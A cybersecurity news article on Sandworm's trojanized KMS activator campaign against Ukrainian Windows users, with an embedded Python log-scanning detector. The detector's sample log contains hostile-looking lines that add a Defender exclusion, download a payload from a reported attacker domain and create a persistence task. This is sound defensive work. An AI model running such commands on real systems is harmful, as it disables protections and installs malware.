Friday, May 9, 2025

Sandworm APT Hackers Weaponize Microsoft KMS Activation Tools To Compromise Windows

In a sophisticated cyber-espionage operation, the Russian state-sponsored hacking group Sandworm (APT44), linked to the GRU (Russia’s Main Intelligence Directorate), has been exploiting pirated Microsoft Key Management Service (KMS) activation tools to target Ukrainian Windows users.

The campaign, which began in late 2023, leverages trojanized KMS activators and fake Windows updates to deploy malware, including the BACKORDER loader and Dark Crystal Remote Access Trojan (DcRAT).

Figure: Torrent info of the malicious KMS Auto Tool.

These tools enable large-scale data theft and espionage, posing significant risks to Ukraine’s critical infrastructure and national security.

Exploiting Pirated Software as an Attack Vector

Ukraine’s heavy reliance on unlicensed software, estimated at 70% in the public sector, has created fertile ground for such attacks.

Many users, including government institutions and businesses, turn to pirated software due to economic constraints.

Sandworm capitalizes on this vulnerability by embedding malware within widely used tools like KMS activators.

Researchers from EclecticIQ identified multiple campaigns distributing a trojanized file named “KMSAuto++x64_v1.8.4.zip” via torrent platforms, disguised as a legitimate Windows activation utility.

Figure: Downloading the Tor Browser from a remote host inside the ZIP folder.

Upon execution, the malicious tool displays a fake Windows activation interface while secretly deploying the BACKORDER loader.

This loader disables Windows Defender by adding exclusion rules through PowerShell commands and then downloads DcRAT from attacker-controlled domains such as “kmsupdate2023[.]com.”

Once installed, DcRAT exfiltrates sensitive data, including screenshots, keystrokes, browser credentials, system information, and even saved credit card details.

The malware also establishes persistence by creating scheduled tasks that ensure its continued operation across system reboots.
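The three behaviours the article attributes to BACKORDER and DcRAT (Defender exclusions added through PowerShell, downloads from the reported domains, and scheduled-task persistence) are all visible in standard Windows telemetry. The script below is an added example written for this page, not code from EclecticIQ or the article, showing how a defender might run those three checks over exported log text. It assumes the lines come from PowerShell Script Block Logging (event 4104), Defender configuration-change events (5007) and process-creation auditing (4688); the sample lines are constructed, and only the two domains come from the article.

```python
import re
from dataclasses import dataclass

# Domains reported in the article, kept defanged so the file is safe to share.
REPORTED_DOMAINS = ("kmsupdate2023[.]com", "kms-win11-update[.]net")

# Behaviours described in the article, expressed as regexes over log text.
# Assumption: text comes from PowerShell Script Block Logging (4104),
# Defender "configuration changed" events (5007) or process creation (4688).
RULES = {
    # Exclusion added via cmdlet, or Defender's own record of the registry change.
    "defender_exclusion": re.compile(
        r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)"
        r"|Windows Defender\\Exclusions\\", re.I),
    # Persistence through the task scheduler, by CLI or cmdlet.
    "scheduled_task": re.compile(
        r"schtasks(\.exe)?\s+/create|Register-ScheduledTask", re.I),
}


@dataclass
class Finding:
    rule: str
    line_no: int
    evidence: str


def refang(domain: str) -> str:
    """Turn the defanged form used in reports back into a matchable hostname."""
    return domain.replace("[.]", ".")


def scan_lines(lines):
    """Return one Finding per (line, rule) match; a line may trigger several rules."""
    findings = []
    for n, line in enumerate(lines, 1):
        for name, rx in RULES.items():
            m = rx.search(line)
            if m:
                findings.append(Finding(name, n, m.group(0)))
        lowered = line.lower()
        for d in REPORTED_DOMAINS:
            # Match both the live hostname and the defanged form some tools log.
            if refang(d) in lowered or d in lowered:
                findings.append(Finding("reported_domain", n, d))
    return findings


def triggered_rules(lines):
    """Distinct rule names hit across the whole log, sorted for stable output."""
    return sorted({f.rule for f in scan_lines(lines)})


# Constructed sample lines (not real telemetry), shaped like the events above.
# The last line is benign and must not be flagged.
SAMPLE_LOG = [
    r"2023-12-04T10:02:11Z 4104 PowerShell ScriptBlock: Add-MpPreference -ExclusionPath 'C:\Users\Public\KMSAuto'",
    r"2023-12-04T10:02:12Z 5007 Windows Defender ConfigChanged: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\KMSAuto = 0x0",
    r"2023-12-04T10:02:13Z 4104 PowerShell ScriptBlock: Invoke-WebRequest -Uri http://kmsupdate2023.com/update.bin -OutFile C:\Users\Public\update.bin",
    r"2023-12-04T10:02:20Z 4688 Security NewProcess: schtasks.exe /create /tn WinUpdate /tr C:\Users\Public\update.exe /sc onlogon",
    r"2023-12-04T10:05:00Z 4104 PowerShell ScriptBlock: Get-ChildItem C:\Temp",
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule} <- {f.evidence}")
```

The exclusion rule fires twice on the sample because the cmdlet text and Defender's own 5007 record describe the same action from two sources; correlating the two in a real pipeline is what turns a noisy exclusion-change alert into a confident one. The domain list is the only part that ages: the regex rules describe behaviour and keep working when the infrastructure changes.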

Linking Sandworm to the Campaign

Multiple indicators strongly attribute this campaign to Sandworm.

These include overlapping infrastructure, shared tactics, techniques, and procedures (TTPs), and the reuse of malware like BACKORDER and DcRAT.

Debug symbols in the malware samples reference Russian-language build environments, further confirming its origin.

Additionally, WHOIS records tied to ProtonMail accounts and typosquatted domains like “kms-win11-update[.]net” reinforce the connection.

This campaign underscores the strategic use of cyber operations in geopolitical conflicts.

By targeting Ukraine’s reliance on pirated software, Sandworm not only compromises individual users but also threatens government networks and critical infrastructure.

Such attacks align with Russia’s broader hybrid warfare strategy, where cyber operations complement physical and economic pressures.

Organizations are advised to avoid pirated software and implement robust cybersecurity measures such as endpoint detection tools and network monitoring systems.

Enhanced awareness of phishing tactics and regular software updates can also mitigate risks from similar campaigns.

Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
